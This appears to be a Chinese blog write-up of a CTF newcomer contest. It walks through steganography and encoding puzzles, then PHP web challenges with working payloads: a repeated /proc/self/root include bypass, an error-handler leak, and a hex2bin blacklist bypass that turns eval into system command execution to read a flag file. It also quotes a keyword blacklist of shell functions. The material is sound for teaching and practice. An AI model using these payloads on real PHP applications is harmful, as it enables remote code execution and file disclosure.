Dest0g3 520迎新赛

最新推荐文章于 2024-02-08 11:33:44 发布

A丶R

最新推荐文章于 2024-02-08 11:33:44 发布

阅读量831

点赞数

文章标签：网络安全 python c语言

本文链接：https://blog.csdn.net/weixin_51804748/article/details/125013657

版权

Misc

Welcome to fxxking DestCTF

签到题，扫码关注发消息拿到flag

Pngenius

┌──(root㉿kali2022)-[~]
└─# zsteg -a /root/桌面/Dest0g3.png                          
[?] 209 bytes of extra data after image end (IEND), offset = 0x116c3
extradata:0         .. file: Zip archive data, at least v2.0 to extract, compression method=deflate
    00000000: 50 4b 03 04 14 00 09 00  08 00 1c b6 a1 54 a1 57  |PK...........T.W|
    00000010: 8e 38 3b 00 00 00 2d 00  00 00 08 00 00 00 66 6c  |.8;...-.......fl|
    00000020: 61 67 2e 74 78 74 1e 2b  1b 51 86 a0 48 d9 b9 38  |ag.txt.+.Q..H..8|
    00000030: 0d 59 aa ff 7d 8c c7 0d  10 c3 94 ff f7 a7 e4 cc  |.Y..}...........|
    00000040: a0 1c 97 65 64 4f 5d 55  e4 c1 8d fe 16 f8 e0 75  |...edO]U.......u|
    00000050: d6 76 49 c4 44 94 e5 03  c7 48 49 e0 9f 9c 73 47  |.vI.D....HI...sG|
    00000060: d5 50 4b 01 02 14 00 14  00 09 00 08 00 1c b6 a1  |.PK.............|
    00000070: 54 a1 57 8e 38 3b 00 00  00 2d 00 00 00 08 00 24  |T.W.8;...-.....$|
    00000080: 00 00 00 00 00 00 00 20  00 00 00 00 00 00 00 66  |....... .......f|
    00000090: 6c 61 67 2e 74 78 74 0a  00 20 00 00 00 00 00 01  |lag.txt.. ......|
    000000a0: 00 18 00 89 13 d5 94 6a  5d d8 01 23 3c b5 5e 6b  |.......j]..#<.^k|
    000000b0: 5d d8 01 ac 2e ca 91 6a  5d d8 01 50 4b 05 06 00  |]......j]..PK...|
    000000c0: 00 00 00 01 00 01 00 5a  00 00 00 61 00 00 00 00  |.......Z...a....|
    000000d0: 00                                                |.               |
imagedata           .. text: "***111+++"
b1,rgb,lsb,xy       .. text: "Password for zip:Weak_Pas5w0rd"
b2,rgb,msb,xy       .. text: "u}]uU}}}"
b6,g,msb,xy         .. file: MPEG ADTS, layer I, v2, Monaural
b7,g,lsb,xy         .. file: , 48 kHz, Monaural
b8,b,msb,xy         .. file: RDI Acoustic Doppler Current Profiler (ADCP)
b1,g,msb,xy,prime   .. file: OpenPGP Public Key
b7,r,lsb,xy,prime   .. file: AIX core file fulldump 32-bit
b8,b,msb,xy,prime   .. file: RDI Acoustic Doppler Current Profiler (ADCP)
b8,rgb,lsb,xy,prime .. file: AIX core file 64-bit
b8,rgb,msb,xy,prime .. file: RDI Acoustic Doppler Current Profiler (ADCP)
b8,bgr,lsb,xy,prime .. file: AIX core file 64-bit
b8,bgr,msb,xy,prime .. file: RDI Acoustic Doppler Current Profiler (ADCP)

zsteg直接查看，png后面的数据段是一个隐藏的压缩包，同时lsb隐写的信息是一个密码，直接解压得到flag

EasyEncode

题目附件是一个加密的压缩包，没有其他任何信息
在这里插入图片描述
首先考虑爆破密码，得到100861，成功解压文件

… -.-. --… … …-- ----- …-- ----- …-- … …-- …— … -.-. --… … …-- ----- …-- ----- …-- …- …-- --… … -.-. --… … …-- ----- …-- ----- …-- … …-- -… … -.-. --… … …-- ----- …-- ----- …-- --… -… .---- … -.-. --… … …-- ----- …-- ----- …-- -… …-- …- … -.-. --… … …-- ----- …-- ----- …-- …- …-- …- … -.-. --… … …-- ----- …-- ----- …-- …- …-- …— … -.-. --… … …-- ----- …-- ----- …-- -… -… … … -.-. --… … …-- ----- …-- ----- …-- …- -… …- … -.-. --… … …-- ----- …-- ----- …-- …-- …-- …-- … -.-. --… … …-- ----- …-- ----- …-- --… …-- …- … -.-. --… … …-- ----- …-- ----- …-- …- …-- … … -.-. --… … …-- ----- …-- ----- …-- … -… .---- … -.-. --… … …-- ----- …-- ----- …-- … …-- --… … -.-. --… … …-- ----- …-- ----- …-- …-- …-- ----. … -.-. --… … …-- ----- …-- ----- …-- -… -… …— … -.-. --… … …-- ----- …-- ----- …-- -… …-- .---- … -.-. --… … …-- ----- …-- ----- …-- … …-- --… … -.-. --… … …-- ----- …-- ----- …-- …-- …-- … … -.-. --… … …-- ----- …-- ----- …-- -… -… … … -.-. --… … …-- ----- …-- ----- …-- … …-- —… … -.-. --… … …-- ----- …-- ----- …-- --… -… .---- … -.-. --… … …-- ----- …-- ----- …-- …- …-- -… … -.-. --… … …-- ----- …-- ----- …-- --… -… .---- … -.-. --… … …-- ----- …-- ----- …-- … …-- —… … -.-. --… … …-- ----- …-- ----- …-- …-- …-- …— … -.-. --… … …-- ----- …-- ----- …-- … …-- … … -.-. --… … …-- ----- …-- ----- …-- …-- …-- ----- … -.-. --… … …-- ----- …-- ----- …-- -… …-- …-- … -.-. --… … …-- ----- …-- ----- …-- …-- …-- …-- … -.-. --… … …-- ----- …-- ----- …-- -… -… …-- … -.-. --… … …-- ----- …-- ----- …-- -… …-- -… … -.-. --… … …-- ----- …-- ----- …-- …- -… … … -.-. --… … …-- ----- …-- ----- …-- …- …-- -… … -.-. --… … …-- ----- …-- ----- …-- …-- …-- ----. … -.-. --… … …-- ----- …-- ----- …-- … …-- -… … -.-. --… … …-- ----- …-- ----- …-- -… …-- -… … -.-. --… … …-- ----- …-- ----- …-- … …-- .---- … -.-. --… … …-- ----- …-- ----- …-- …— …-- … … -.-. --… … …-- ----- …-- ----- …-- …-- …-- …-- … -.-. --… … …-- ----- …-- ----- …-- …- …-- …- … -.-. --… … …-- ----- …-- ----- …-- …— …-- … … -.-. --… … …-- ----- …-- ----- …-- …-- …-- …-- … -.-. --… … …-- ----- …-- ----- …-- …- …-- …-

文本中发现了摩斯密码，拿去解密得到16进制串

5c75303035325c75303034375c75303035365c75303037615c75303036345c75303034345c75303034325c75303036655c75303034645c75303033335c75303037345c75303034355c75303035615c75303035375c75303033395c75303036625c75303036315c75303035375c75303033355c75303036655c75303035385c75303037615c75303034365c75303037615c75303035385c75303033325c75303035355c75303033305c75303036335c75303033335c75303036635c75303036365c75303034655c75303034365c75303033395c75303035365c75303036365c75303035315c75303032355c75303033335c75303034345c75303032355c75303033335c7530303434

再把16进制转成字符串，得到Unicode编码

\u0052\u0047\u0056\u007a\u0064\u0044\u0042\u006e\u004d\u0033\u0074\u0045\u005a\u0057\u0039\u006b\u0061\u0057\u0035\u006e\u0058\u007a\u0046\u007a\u0058\u0032\u0055\u0030\u0063\u0033\u006c\u0066\u004e\u0046\u0039\u0056\u0066\u0051\u0025\u0033\u0044\u0025\u0033\u0044

再转字符串得到base64

RGVzdDBnM3tEZW9kaW5nXzFzX2U0c3lfNF9VfQ%3D%3D

解密得到flag
Dest0g3{Deoding_1s_e4sy_4_U}

你知道js吗

附件没有扩展名，放入010查看发现是pk，解压后得到一堆xml文件
将base64部分解码后得到

'<html>\n<body>\n\n<!DOCTYPE html>\n<html>\n<head>\n    <title>Do You Know js</title>\n<HTA:APPLICATION\n  APPLICATIONNA
ME="Do You Know js"\n  ID="Inception"\n  VERSION="1.0"\n  SCROLL="no"/>\n \n<style type="text/css">\n</head>\n    <div i
d="feature">\n            <div id="content\n\t\t\t\t</style>\n                <h1 id="unavailable" class="loading">Build
ing js.....</h1>\n\t\t\t\t<script type="text/javascript" language="javascript">\n\t\t\t\t\tfunction RunFile() {\n
   var WshShell = new ActiveXObject("WScript.Shell");\n\t\t\t\t\tWshShell.Run("notepad %windir%/Desktop/js.txt", 1, fals
e);\n          /* var oExec = WshShell.Exec("notepad"); */\n\t\t\t\t\t}\n\t\t\t\t</script>\n        </div>\n    </div>\n
<body>\n\t<input type="button" value="Implant Inception Here" onclick="RunFile();"/>\n\t<p style="color:white;">\n\n++++
+ ++[-> +++++ ++<]> +++.. ++.-. ++.-- --.++ ++.-- \n-.-.- --.++ ++++.\n+.--- -..++ ++.<+ ++[-> +++<] >++.< +++[- \n>---<
 ]>--- ---.+ ++++. -----\n.+++. ...-- ---.+ ++++. ---.+ ++.-- ---.+ ++++. ---.. +++++ +.--- ----.\n<++++ [->++ ++<]> ++.
<+ +++[- >---- <]>-. ---.+\n +++++ .---- -.++. ++.+.\n--.-- .<+++ +[->+ +++<] >++.< ++++[ ->--- -<]>- \n.+.-. ---.+ ++.+
. -.+++\n+.--- --.<+ +++[- >++++ <]>++ .<+++ [->-- -<]>- ----. ----. +.+++ +.---\n-.--- .+++. -..<+ +++[- >++++ <]>++ \n
.<+++ +[->- ---<] >-.++ +++.- ----.\n+++.. ---.+ ++.-- --.+. ..+++ +.-.- ----. +++++ \n.---- .+.++ ++.-- --.++\n++.-. --
--. +.-.+ ++++. \n<+++[ ->+++ <]>++ ++.<\n</p>\n</body>\n</body>\n  </html>\n'

中间的一串符号是BrainFuck的OOK加密，解密后得到16进制串，解密得到flag

446573743067337B38366661636163392D306135642D343034372D623730322D3836636233376162373762327D
#Dest0g3{86facac9-0a5d-4047-b702-86cb37ab77b2}

StrangeTraffic

追踪Modbus流得到RGVzdDBnM3szMUE1QkVBNi1GMjBELUYxOEEtRThFQS0yOUI0RjI1NzEwOEJ9，解码后得到flag

Web

phpdest

<?php
highlight_file(__FILE__);
require_once 'flag.php';
if(isset($_GET['file'])) {
    require_once($_GET['file']);
}

这里使用的是PHP最新版的小Trick，require_once包含的软链接层数较多事 once 的 hash 匹配会直接失效造成重复包含

/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag.php

EasyPHP

<?php
highlight_file(__FILE__);
include "fl4g.php";
$dest0g3 = $_POST['ctf'];
$time = date("H");
$timme = date("d");
$timmme = date("i");
if(($time > "24") or ($timme > "31") or ($timmme > "60")){
    echo $fl4g;
}else{
    echo "Try harder!";
}
set_error_handler(
    function() use(&$fl4g) {
        print $fl4g;
    }
);
$fl4g .= $dest0g3;
?>

异常处理函数中可以输出flag，我们可以在传参的时候传入数组，触发异常得到flag

?ctf[]=1

SimpleRCE

<?php
highlight_file(__FILE__);
$aaa=$_POST['aaa'];
$black_list=array('^','.','`','>','<','=','"','preg','&','|','%0','popen','char','decode','html','md5','{','}','post','get','file','ascii','eval','replace','assert','exec','$','include','var','pastre','print','tail','sed','pcre','flag','scan','decode','system','func','diff','ini_','passthru','pcntl','proc_open','+','cat','tac','more','sort','log','current','\\','cut','bash','nl','wget','vi','grep');
$aaa = str_ireplace($black_list,"hacker",$aaa);
eval($aaa);
?>

黑名单非常多，可以用16进制绕过

POST
aaa=hex2bin(‘73797374656D’)(‘/bin/ca? /fla?’);

A丶R

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
2
评论
Dest0g3 520迎新赛

MiscWelcome to fxxking DestCTF签到题，扫码关注发消息拿到flagPngenius┌──(root㉿kali2022)-[~]└─# zsteg -a /root/桌面/Dest0g3.png [?] 209 bytes of extra data after image end (IEND), offset = 0x116c3extradata:0 .. file: Zip archive data
复制链接

扫一扫